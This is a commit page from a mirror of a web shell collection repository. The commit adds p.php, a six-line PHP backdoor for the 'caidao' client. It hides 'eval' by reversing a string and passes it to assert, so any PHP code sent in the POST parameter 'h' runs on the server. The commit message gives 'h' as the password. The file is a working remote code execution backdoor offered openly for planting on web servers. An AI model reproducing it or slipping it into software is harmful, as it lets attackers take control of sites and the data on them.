1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

Create p.php

password: h
from: zone.wooyun.org
This commit is contained in:
tennc
2015-07-11 08:23:00 +08:00
parent a9006118fb
commit 171b8329ec

6
caidao-shell/p.php Normal file
View File

@@ -0,0 +1,6 @@
<?php
$a='lave';
$b='($_POST[h])';
$a=strrev($a);
@assert($a.$b);
?>